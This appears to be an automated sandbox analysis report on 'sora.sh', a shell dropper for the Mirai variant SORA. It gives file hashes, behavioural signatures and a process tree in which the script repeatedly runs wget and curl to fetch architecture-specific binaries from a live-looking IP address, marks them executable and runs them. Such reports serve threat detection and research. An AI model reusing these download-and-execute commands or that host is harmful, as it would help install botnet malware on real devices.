Analysis
-
max time kernel
34s -
max time network
39s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-08-2024 05:14
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
sora.sh
-
Size
2KB
-
MD5
fe9fcc98f0d2d8350fd699bb3edf3419
-
SHA1
5480c071e63cc7dd040b18ebc62c4a3cb7d5b5eb
-
SHA256
faa68fe6ab7972ae17be23f4bed8c482a676935fcf257dca0cc6e51699e16213
-
SHA512
4994f7fc91e833a29b978f9ddd49657554ba0b4cf4c7e3f6d0d956447c45eb876f85e97644481267b58cd0172d471a0e6da89bba9998d14a22ebf499695d054c
Malware Config
Extracted
mirai
SORA
Signatures
-
Executes dropped EXE 10 IoCs
Processes:
robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenioc pid process /tmp/robben 685 robben /tmp/robben 698 robben /tmp/robben 704 robben /tmp/robben 715 robben /tmp/robben 726 robben /tmp/robben 742 robben /tmp/robben 753 robben /tmp/robben 767 robben /tmp/robben 787 robben /tmp/robben 825 robben -
Processes:
resource yara_rule /tmp/robben upx /tmp/robben upx /tmp/robben upx /tmp/robben upx /tmp/robben upx -
Changes its process name 1 IoCs
Processes:
robbendescription ioc pid process Changes the process name, possibly in an attempt to hide itself mi35h115koc411kkm 825 robben -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads runtime system information 22 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlrobbenrobbendescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe robben -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlwgetcurlwgetwgetwgetcurlsora.shcurlwgetcurlwgetcurlwgetcurlcurlcurlcurldescription ioc process File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm6 curl
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:659 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.x862⤵
- Writes file to tmp directory
PID:666 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672 -
/bin/catcat sora.x862⤵PID:682
-
/bin/chmodchmod +x robben sora.sh sora.x86 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:684
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:685 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.mips2⤵
- Writes file to tmp directory
PID:687 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:691 -
/bin/catcat sora.mips2⤵PID:696
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:697
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:698 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:700 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701 -
/bin/catcat sora.x86_642⤵PID:702
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:703
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:704 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.i4682⤵PID:707
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709 -
/bin/catcat sora.i4682⤵PID:713
-
/bin/chmodchmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:714
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:715 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.i6862⤵
- Writes file to tmp directory
PID:717 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720 -
/bin/catcat sora.i6862⤵PID:724
-
/bin/chmodchmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:725
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:726 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:729 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735 -
/bin/catcat sora.mpsl2⤵PID:738
-
/bin/chmodchmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:740
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:742 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm42⤵PID:744
-
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747 -
/bin/catcat sora.arm42⤵PID:750
-
/bin/chmodchmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:752
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:753 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm52⤵
- Writes file to tmp directory
PID:754 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:758 -
/bin/catcat sora.arm52⤵PID:764
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:766
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:767 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm62⤵
- Writes file to tmp directory
PID:768 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782 -
/bin/catcat sora.arm62⤵PID:785
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-718481293485437aaa2e4f293c3e8c02-systemd-timedated.service-ceP5dY2⤵PID:786
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Reads runtime system information
PID:787 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.arm72⤵
- Writes file to tmp directory
PID:788 -
/usr/bin/curlcurl -O http://91.92.252.2/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822 -
/bin/catcat sora.arm72⤵PID:823
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_642⤵PID:824
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Changes its process name
- Reads runtime system information
PID:825 -
/usr/bin/wgetwget http://91.92.252.2/bins/sora.ppc2⤵PID:826
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD5545cc0b3e5dae8244debe55a41e14a9f
SHA1101ad459b5b114c0a79c458cd0c0d2374a3698a1
SHA256a916866d96e7215899fb4387c14b52725ec83de463dd0302c8cc72b8cade2d91
SHA5121e90d63777c07e490540fe00f41a2f50d157c0e2b7c979204e8fc5a9775cbdd21a7e317290c82c552897cdb30320a08d1ca705e33e1d947e837ff14e6ca56611
-
Filesize
28KB
MD58d068eba527935d34fbff880f4cf7530
SHA182f50f55fb025735b62fca14362600132b21c2d0
SHA256bce45bca1f30fecce6ce8bf4c4dfcc1c9c19517144398aa91b9a63c01995c147
SHA5126cc29217a507b4072469b11f63a8da070a70e4228a36a0ea612f905789ca0f829c47bd290d9c09024bfe88c7e28fff8d430e9e9def5a6124b90cedb49f029c14
-
Filesize
28KB
MD5fa8042bc292cb4403494d779833de7ca
SHA1a78431e9ef2fac7f3a909c06a81e643369a17ee4
SHA2561ec5ec93f91f140dbdfbb8a3f79828be32737673e60b6b8999d3a5c520a1b5f5
SHA512fe9e309c7b18a1c25d10d418cea499a1385f4c227fb5a64e491b1ca3d5819a5677f80280194b4dcc2aa7cc69aa6b7c1775a3cd54143f45aed0dc0ddcb199de82
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5a9d839dd97abb474595bc7e18157aa64
SHA182c1ec7eae6dd1bc7dcfd1e89911d328c899c885
SHA2563bb3ff14162d0b66a51f448e8ff9e9018aa0040941de829f8748911b4471d90d
SHA5124311ce9b061bf6f01b3b004eb0c0b14a4fb86b1a11c040fd8b633c3a3a27821c74775a4eeec82d22e8eacddbc35736814800dcf9dbca85218f189fda4b1d8993
-
Filesize
51KB
MD5e72c2c2ffa7161b4dccea4ed34785c2a
SHA1af392b3dcaaac89b76794e4d67ec02055dbe6d7a
SHA256c5f439d49fb65081bb4b21fe928b7492cd52e43f6a63380389758c719bbf3f89
SHA512fa17789905a834a7d4de21bf7d0bd938b346b142ad34e0c32aef85ccd8296b72d026e6483136e67df2d5a0f0f6a91e3e0ccaf464b3ce56a2ceebf5c2de63273a